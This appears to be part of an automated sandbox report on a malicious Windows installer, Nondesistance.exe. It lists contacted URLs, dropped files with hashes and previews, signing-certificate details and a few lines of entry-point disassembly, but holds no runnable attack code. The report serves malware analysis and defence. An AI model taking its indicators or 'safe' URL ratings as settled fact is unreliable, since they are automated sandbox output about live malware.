                                                                            https://www.ecosia.org/newtab/write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://nsis.sf.net/NSIS_ErrorNondesistance.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.iv.lt/vps-serveriai/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://klientams.iv.lt/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campajbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.namesilo.com/domain/search-domains?query=l7aeh.usjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25038661256.00000000078C0000.00000004.00000800.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://events.webnode.com/projects/-/events/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://assets.iv.lt/default.cssjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdNondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://assets.iv.lt/images/icon.pngwrite.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://drive.usercontent.google.com/xNondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://apis.google.comNondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.iv.lt/talpinimo-planai/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://whois.gandi.net/en/results?search=avocatmh.orgjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://img.sedoparking.com/templates/bg/NameSiloLogo.pngjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006C80000.00000004.80000000.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.iv.lt/neribotas-svetainiu-talpinimas/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://drive.usercontent.google.com/Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.iv.lt/svetainiu-kurimo-irankis/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://drive.google.com/HdNondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.iv.lt/el-pasto-filtras/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.sedo.com/services/parking.php3write.exe, 0000000B.00000002.25035537727.0000000005E80000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://ac.ecosia.org/autocomplete?q=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.osbornesargent.co.ukjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25030471443.0000000000648000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdNondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://drive.google.com/hdNondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1447915
Start date and time: 2024-05-27 12:28:18 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Nondesistance.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/8@31/16
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 72%
• Number of executed functions: 55
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ctldl.windowsupdate.com, api.msn.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time: 06:31:39
Type: API Interceptor
Description: 28389232x Sleep call for process: write.exe modified
Process: C:\Windows\SysWOW64\write.exe
File Type: SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 188416
Entropy (8bit): 0.9926780404836638
Encrypted: false
SSDEEP: 192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
MD5: BE092D0FC1A86091764AABD40B25CB9E
SHA1: 1372556BBC211898F393CC02C4285705AACAE3D7
SHA-256: 3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
SHA-512: EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):48
                                                                                                Entropy (8bit):4.78778203183594
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:iGAIEXrcAQLQIfLBJXmgxv:lAIccAQkIP2I
                                                                                                MD5:F5FDC9A00B0149608E24C58FD5249EA4
                                                                                                SHA1:E2D50A7CDC8E7A9F9CC9F86074AE23F86A32F841
                                                                                                SHA-256:12D2CA5CF65237CE9AC610E3A80AD20135A76D7E62C1FD92DED6CEA68F774C7C
                                                                                                SHA-512:178DFAB68C39D0D58650B5AEECB702002E82683CD44777920AD884DA89C31BBD1164345CF7F1EC11CD851A249CB4CD7DA0C546C048AADB47F00B7A21304BC7F4
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:[Access]..Early=user32::EnumWindows(i r1 ,i 0)..
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):11264
                                                                                                Entropy (8bit):5.770824470205811
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:PPtkumJX7zB22kGwfy0mtVgkCPOs81un:E702k5qpds8Qn
                                                                                                MD5:B8992E497D57001DDF100F9C397FCEF5
                                                                                                SHA1:E26DDF101A2EC5027975D2909306457C6F61CFBD
                                                                                                SHA-256:98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
                                                                                                SHA-512:8823B1904DCCFAF031068102CB1DEF7958A057F49FF369F0E061F1B4DB2090021AA620BB8442A2A6AC9355BB74EE54371DC2599C20DC723755A46EDE81533A3C
                                                                                                Malicious:false
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
• Filename: Platosammine.exe, Detection: malicious
• Filename: FRA.0038222.exe, Detection: malicious
• Filename: Platosammine.exe, Detection: malicious
• Filename: FRA.0038222.exe, Detection: malicious
• Filename: file.zip, Detection: malicious
• Filename: Borgerreprsentants.exe, Detection: malicious
• Filename: Borgerreprsentants.exe, Detection: malicious
• Filename: Eparch.exe, Detection: malicious
• Filename: Eparch.exe, Detection: malicious
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):914
                                                                                                Entropy (8bit):3.1516065880391015
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8wl0hRsXUjO/tz0/CSL/KlDe5MJysDeKA8DmzCNfBf4t2YCBTo:8F+VWL/K5eusGeDamyjJT
                                                                                                MD5:91422962043111D43F5BF627D7351B97
                                                                                                SHA1:EA38CEB1BEADCE16E3F744EA1F9891CFAFD4CBEB
                                                                                                SHA-256:EB85BD9933CB721C2D21F5E83EEAAC1B097DB60EAFBA378F9B402AF5884C3AA5
                                                                                                SHA-512:631A29B5AA58AF11CD505F9D93AFF456E555D92C51A2EEE58EFCB6174E3D0BE1B0678B315DAD16EFEE9425993943CCEC5F13C82E9BD7A18F679E4F2B7201EBC4
                                                                                                Malicious:false
                                                                                                Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................D.y.l.a.n.e.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....r.2...........immoralizing.tar..R............................................i.m.m.o.r.a.l.i.z.i.n.g...t.a.r... ...#.....\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.m.m.o.r.a.l.i.z.i.n.g...t.a.r. .C.:.\.U.s.e.r.s.\.D.y.l.a.n.e.\.d.e.w.a.t.e.r.\.r.e.i.n.s.m.e.n.............}.............>.e.L.:..er.=}...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.3.................
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):335679
                                                                                                Entropy (8bit):7.6760597278088785
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:7c4er9ypF/PERLfJCNY0REpE15xL+cRHQdo:7TeriFufJC0axLVf
                                                                                                MD5:89A22809A4D9410B8EC476B4FD7A47F6
                                                                                                SHA1:F4562B8538F640E67D0BD4D5D45218C12587F64A
                                                                                                SHA-256:F720F87C41DD1FD5068412983F93280011C03E00D6C2CA9A4B229C2CF38F82B3
                                                                                                SHA-512:8CA7140806DF7BAEE123D39FE598A3919A76EAFD4E7A2229386786F8A62A781BE38DEBBCB6C551026B1B4EC7AFC957EFF580E6ED4BD010D36A5C35BF105DB467
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1156117
                                                                                                Entropy (8bit):0.15837846074819772
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:lw/QDanxkHslOtDNAzJhjvMhXij4BgUdFaCLRgWLdGvI6r2C:
                                                                                                MD5:15086A2F35483FA21698895B6782DF8E
                                                                                                SHA1:6AD798618E183D7FEBF163B039C3AE2FB50B2CD9
                                                                                                SHA-256:4B0C2B861F5C47806E6867575455247161434E204ADB92AB64E4833704A766D4
                                                                                                SHA-512:7E350909621DC8E8E3AA306345B51A5EFFC6539A505797CCD41C26757DD57ABEBC812A2DA0BCB75E1352FD9CC1BFC01988E646C8B979EBF11C5358BBE945E2F1
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1082113
                                                                                                Entropy (8bit):0.15825869931191344
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:y2tg6J3SwdsrlFv3IPRJhGeRG0KNBTIIxWTn69lRFHoDmO:2c
                                                                                                MD5:C2380BB148EBA394BBCAAE245586A67F
                                                                                                SHA1:020741FF474FC23B667F62EDD835D4C49E2A92DF
                                                                                                SHA-256:DE656771FCE0CF164EB1876321D1EC9033DA5BE088B07F98EBAA6F9CABBFC149
                                                                                                SHA-512:264F1832D6E002948F9EACA63EF663580557F7D8B21143D2E3BB06D1F07797C2428674ED9EAF67FE308B98D8A4964794118B2AAAE8CBAB01EBA4EB139D4400AE
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\Nondesistance.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):483
                                                                                                Entropy (8bit):4.2279428457950745
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:bFgRYHQ/LqFV/mMka7LsQIaKfMJ10bQSEX/bNs2LvKAVTKn:bFgouWH/mMkpQRXJ10sSEPb7CmTKn
                                                                                                MD5:7822DA4CB788A4E45B36549F28A392C8
                                                                                                SHA1:9B9AD515D5B1042E6C6C3D7F766AA318D69AF5A2
                                                                                                SHA-256:B08B0B8C9E2DC6B97815501883D21EC3849A978B91ABE0B685FAD68C6272411B
                                                                                                SHA-512:FEB7336D0A92134F25EF9814C643CE903A0C4816E887FA040CC890DEB428083C17BE97EE120E9B43C176405B6F6E6CDF9B504D6D3B5C22E18E70EE69C5C32E78
                                                                                                Malicious:false
                                                                                                Preview:statsrevisors noninstitutionally despairs amphistomatic inclination speciated etagen.piruetter nodestativ polyamylose afresca legions superincumbently prisndringers postaxiad bottomrying sekstendedelsnodernes fascis huastec..smergledes srbeskatningens filologiens slaaerens sextains,prehensorial misundelsesvrdigeres anchors riotry blgvanters.siliqua amtsligningsraadenes pulses kyra suffisance thumbing stomatorrhagia..unitude nonagrarian retear embowl slageren gaardhaven swarajes.
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                Entropy (8bit):6.212836401994695
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:Nondesistance.exe
                                                                                                File size:878'808 bytes
                                                                                                MD5:9695b61f42f2e5a77e2e8d29963fe980
                                                                                                SHA1:92396f929ffc0ec1c2929dcba7fa2b3de5859bc0
                                                                                                SHA256:1c6b868bda50a13de084c97460436742b1636b75e60708eeecb9c44d574ccce9
                                                                                                SHA512:58921b73bcd5986bd568bf9d7adcfb737c0fd42e873924f183ea1197d669902842c23b191a12bf0446cb9fbe644fd10ff5418d0c125e69f6393c6e1c8ddef0bb
                                                                                                SSDEEP:12288:ZVcDbJfzoHrfKapRad9PqECAkRQkWw4QSsOWatBhP5FnM:4DbJfzUrCaSLPqECAkRWtTPM
                                                                                                TLSH:F8159C16B7B48A13C10747338CA38BD56275EF94AE629B0F3258B2196F713EF07462D6
                                                                                                Icon Hash:7b29343736230907
                                                                                                Entrypoint:0x40310f
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x57017AB3 [Sun Apr 3 20:18:59 2016 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:E=Dagln@ruralism.El, O=Hvalrosserne, OU="Transcendentalized Giftemoden ", CN=Hvalrosserne, L=Juvanz\xe9, S=Grand Est, C=FR
                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                Error Number:-2146762487
Not Before: 01/04/2024 08:46:43
Not After: 01/04/2027 08:46:43
                                                                                                Subject Chain
                                                                                                • E=Dagln@ruralism.El, O=Hvalrosserne, OU="Transcendentalized Giftemoden ", CN=Hvalrosserne, L=Juvanz\xe9, S=Grand Est, C=FR
                                                                                                Version:3
                                                                                                Thumbprint MD5:8D105C0C6085F945D3F5F7E86F35AFCC
                                                                                                Thumbprint SHA-1:1A750729FC907CE0EF0427253002457A2BA98ABC
                                                                                                Thumbprint SHA-256:FF0CB3B10B1950EDD600C121B64451FE8063F88F4A64AD3F00113079E45E9EFC
                                                                                                Serial:111C3B47C01A9D77B4B65F7933B21D62CFAECA4C
                                                                                                Instruction
                                                                                                sub esp, 00000184h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                xor ebx, ebx
                                                                                                push 00008001h
                                                                                                mov dword ptr [esp+18h], ebx
                                                                                                mov dword ptr [esp+10h], 00409198h
                                                                                                mov dword ptr [esp+20h], ebx
                                                                                                mov byte ptr [esp+14h], 00000020h
                                                                                                call dword ptr [004070A8h]
                                                                                                call dword ptr [004070A4h]
                                                                                                cmp ax, 00000006h
                                                                                                je 00007F2E80AC0923h
                                                                                                push ebx
                                                                                                call 00007F2E80AC3891h
                                                                                                cmp eax, ebx
                                                                                                je 00007F2E80AC0919h
                                                                                                push 00000C00h
                                                                                                call eax
                                                                                                mov esi, 00407298h
                                                                                                push esi
                                                                                                call 00007F2E80AC380Dh
                                                                                                push esi
                                                                                                call dword ptr [004070A0h]
                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                cmp byte ptr [esi], bl
                                                                                                jne 00007F2E80AC08FDh
                                                                                                push ebp
                                                                                                push 00000009h
                                                                                                call 00007F2E80AC3864h
                                                                                                push 00000007h
                                                                                                call 00007F2E80AC385Dh
                                                                                                mov dword ptr [0042E404h], eax
                                                                                                call dword ptr [00407044h]
                                                                                                push ebx
                                                                                                call dword ptr [00407288h]
                                                                                                mov dword ptr [0042E4B8h], eax
                                                                                                push ebx
                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                push 00000160h
                                                                                                push eax
                                                                                                push ebx
                                                                                                push 00428828h
                                                                                                call dword ptr [00407174h]
                                                                                                push 00409188h
                                                                                                push 0042DC00h
                                                                                                call 00007F2E80AC3487h
                                                                                                call dword ptr [0040709Ch]
                                                                                                mov ebp, 00434000h
                                                                                                push eax
                                                                                                push ebp
                                                                                                call 00007F2E80AC3475h
                                                                                                push ebx
                                                                                                call dword ptr [00407154h]
                                                                                                Programming Language:
                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7534 | 0xa0 | .rdata
